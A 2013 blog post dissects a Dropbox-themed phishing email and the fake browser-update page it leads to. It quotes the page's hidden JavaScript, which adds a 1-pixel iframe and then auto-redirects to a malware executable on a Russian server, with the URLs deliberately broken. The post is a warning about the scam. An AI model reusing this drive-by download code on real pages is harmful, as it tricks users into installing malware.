Saturday, October 19, 2013

Saturday morning scammers and scumbags

Now here’s a subtle little scam.

Got an e-mail allegedly from Dropbox asking me to “update my password as I hadn’t logged in for a while.”  Remarkably for once I actually do use that service, but there’s a systray app that logs in automatically on boot, so red flag #1.

Unremarkably, the nice, friendly login button in the e-mail points to a compromised webserver, nothing special there.  What *was* interesting though was the peripheral approach taken to try to suck people in.  These pricks are really getting very subtle at this sort of thing.

Instead of the usual fake-landing-page-designed-to-look-real, I got a very realistic redirection delay, got to love the code snippet that does it:

window.onload = function() {
                 // It's "cool" to let user wait 2 more seconds :/
            }

You then get a nice, friendly page warning you of a security vulnerability with your PC - what helpful people!




Every single internet user in the world is constantly bombarded with security warning, dire threats of armageddon to their data and PC, and is probably quite used to doing these sorts of updates as a knee-jerk reaction, right?

(The weakness here is that Chrome updates itself automatically, and who in their right mind would want to run IE on Linux??).  But then again this sort of scam isn't intended to catch people who know what they are doing anyway...

Of course, while the graphics themselves are simply hotlinked directly off http://updatebrowser.net, they point to a dodgy Russian webserver, and all of them to the same file http://dynamooblog.ru:8080/ieupdate[URL breaker].exe.

What's *really* fun is this little snippet of code hidden at the end of the page:

if(OSName=="Windows") {
ifrm = document.createElement("IFRAME");
   ifrm.setAttribute("src", "http://dynamooblog.ru:8080/dropbox/check[\URL breaker].php");
   ifrm.style.width = 1+"px";
   ifrm.style.height = 1+"px";
   document.body.appendChild(ifrm);
setTimeout(function() {
   document.getElementById('container').style.display = 'block';
   setTimeout(function() {
window.location = 'http://dynamooblog.ru:8080/ieupdate[URL breaker].exe';
   },50000);
  
                }, 5000);
}


That little gem automatically initiates the download of the file to a Windows system anyway after 50 seconds... no interaction required from the user, only leaving the browser open long enough.  I only caught it because FDM caught the download initiation.

Now imagine what would have happened if the file auto-ran on completion of download...

No comments:

Post a Comment

Please be aware that all comments are moderated so if you're a scumbag spammer then I suggest not wasting your time. Your spam will not be seen by anyone.

Note: Only a member of this blog may post a comment.